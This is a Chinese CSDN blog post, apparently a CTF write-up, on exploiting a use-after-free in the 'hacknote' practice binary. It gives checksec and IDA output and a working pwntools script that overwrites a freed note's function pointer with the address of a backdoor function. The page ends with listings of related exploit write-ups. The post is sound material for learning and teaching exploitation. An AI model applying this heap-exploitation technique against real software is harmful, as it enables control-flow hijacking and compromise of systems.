pwn 堆入门之use after free

最新推荐文章于 2023-12-20 16:48:26 发布
最新推荐文章于 2023-12-20 16:48:26 发布
阅读量144 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42689613/article/details/115556740
版权

目录

hacknote

file checksec

root@ubuntu:/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote# file hacknote
hacknote: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8278e3f039d24b529afdaa536d8093784a7e4033, not stripped
root@ubuntu:/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote# checksec hacknote[*] '/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote/hacknote'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

ida32查看

int menu()
{
  puts("----------------------");
  puts("       HackNote       ");
  puts("----------------------");
  puts(" 1. Add note          ");
  puts(" 2. Delete note       ");
  puts(" 3. Print note        ");
  puts(" 4. Exit              ");
  puts("----------------------");
  return printf("Your choice :");
}
结构体
00000000 note            struc ; (sizeof=0x8, mappedto_1)
00000000 put             dd ?                    ; offset
00000004 content         dd ?                    ; offset
00000008 note            ends

#!/usr/bin/env python2
from pwn import *

arch = "i386"
filename = "hacknote"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)


# libc

def add(i,size,content):
    io.sendline('1')
    io.sendline(str(size))
    io.sendline(content)

def delete(index):
    io.sendline('2')
    io.sendline(str(index))

def p(index):
    io.sendline('3')
    io.sendline(str(index))


def b(addr):
    bk = "b *" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")

    add(0,32,b'aaaa')
    add(1,32,b'bbbb')
    #b(0x08048A7C)
    delete(0)
    delete(1)
    b(0x08048A7C)
    magic_addr=0x08048986
    add(1,8,p32(magic_addr))
    #b(0x08048A7C)
    p(0)
    io.recv()
    io.interactive()
main()
qingmu-z
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn学习——UseAfterFree hacknote
MrTreebook的博客
11-28 253
pwn学习——UseAfterFree hacknote1. 反编译看一下源代码2.add_note3.print_note4.del_note5.exp6.运行结果 1. 反编译看一下源代码 可以看到大概有四个功能 add del print menu 另外还有后门函数magic 2.add_note 可以看到在添加note的时候,每一个note有两个部分 第一个部份是一个put函数 第二个部分存放的是real_content 一个note节点内部结构是这样的 3.print_note 调用pu
[pwn]Use After Free
Breeze的博客
09-06 8589
Use After Free:time_formatter writeup UAF漏洞就是Use After Free,再释放后继续使用,Use After Free会引发各种奇怪的现象,根据场景的不同并没有一种统一的利用方式。下面看题目:time_formatter 日常惯例,先查看安全策略: 开启了canary、NX、ASLR,然后查看一下程序逻辑: 很常见的菜单,下面查看一下各种功能:...
pwnuse_after_free
Maxmalloc的博客
12-08 525
题目链接 先贴出源代码 add_note notelist[i] = malloc(8u); ... *(_DWORD *)notelist[i] = print_note_content; printf("Note size :"); read(0, &buf, 8u); size = atoi(&am...
[BUUCTF]pwn - wustctf2020_easyfast (Use After Free)
半岛铁盒的博客
06-10 403
打开菜单,了解到相应的功能后,改一下名字 这个漏洞大致利用方式是这样的; 利用思路 通过double free修改chunk0的fd指针,让申请到的chunk能够覆盖到0x602090,修改1为0,最后直接调用backdoor来getshell from pwn import * #p=process('./wustctf2020_easyfast') p=remote("node3.buuoj.cn",25044) context.log_level="debug" def add(si
CTF用户态pwn总结(二) Unlink
weixin_41918450的博客
09-26 1589
CTF用户态pwn总结(二) Unlink unlink是CTF中非常常见的一种题型 unlink时的一些性质 unlink是在free掉一个chunk的时候,如果与之相邻的chunk是free状态,并且不是投票chunk时,会将chunk从原来的链表中unlink,并触发合并,fast bin并不会触发合并,只有当满足条件触发fast bin合并时,即当申请的chunk大小大于fast bins...
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF入门PWN的学习,是入门指导。
warmup pwn入门
02-11
pwn入门
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
[pwn]:unlink绕过,0CTF2015 freenote详解
Breeze的博客
09-02 9290
[pwn]:2free=unlink绕过,0CTF2015 freenote 题目地址,提取码:f0xd 拿到题目,国际惯例,首先查看安全策略; 没有开启PIE和full partial。然后查看程序逻辑: 函数的名字已经被我改过了,比较常见的溢出漏洞的菜单和功能,值得一提的是init__函数(原来名字是啥我忘了): 申请了一大块地方,用来做记事本的索引。这个结构体在后面根据上下文可以...
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
CTF-PWN--【use after free-2】
llovewuzhengzi的博客
12-20 1011
再看实际的buf的有多少,如果大于15就用malloc分配实际长度的,其指针为dest,然后将buf的内容复制进去,同时更新ptr里的内容,前八个字节为dest的值然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free两次,先free存储内容的指针,再free原ptr指针。如果小于15,就直接将buf的内容赋值到ptr的开始部分,然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free一次。同样,AH是ax的高8位,而AL是ax的低8位,这就是说ah为33h,al为44h。
溢出----Use After Free
qq_42192672的博客
10-23 4754
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/ 不得不说有些被坑的感觉,Off-By-One也太难了,问了下大神,我觉得还是先把这个弄懂,那篇学习记录我就先咕咕咕了 以下截图来自CTFWIKI,感觉说的概念挺明确的 从这里我深刻体会到了栈和的不同,以及的困难,没有EIP给我直接...
Use After Free
kelxLZ的博客
07-05 1668
Author:ZERO-A-ONE Date:2021-07-05 一、概念 Use after free:顾名思义,某块内存在释放后还能被用户使用;一般存在于,free后没有将指针置为NULL,导致野指针的存在 二、例题 2.1 hacknote 我们先检查一下这个程序 (base) syc@ubuntu:~/Desktop/unlink/hacknote$ checksec hacknote [*] '/home/syc/Desktop/unlink/hacknote/hacknote' .
pwn的一些技巧与总结
weixin_30477797的博客
09-27 857
原文地址:https://github.com/Naetw/CTF-pwn-tips 目录 溢出 在gdb中寻找字符串 二进制服务 找到libc中特定函数的偏移地址 Find '/bin/sh' or 'sh' in library Leak stack address gdb中的fork问题 Secret of a mysterious section - .tls Predictable R...
pwn利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4634
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn利用的一些姿势 – malloc_hook 概述   在做题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
好好说话之Use After Free
hollk’s blog
09-28 4803
到了Use After Free啦,总体来说这种手法并不复杂,特征也很明显,就是在静态分析阶段观察释放chunk之后指针是否置空。本以为参加hw会往后拖更,没想到这么快就写完了。如果前面一直跟着学的话这部分也应该难不到你,我会在接下来的Fastbin Attack等你,加油~
四台服务器分别部署组件内容.md
最新发布
07-24
四台服务器分别部署组件内容.md
二进制利用入门Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值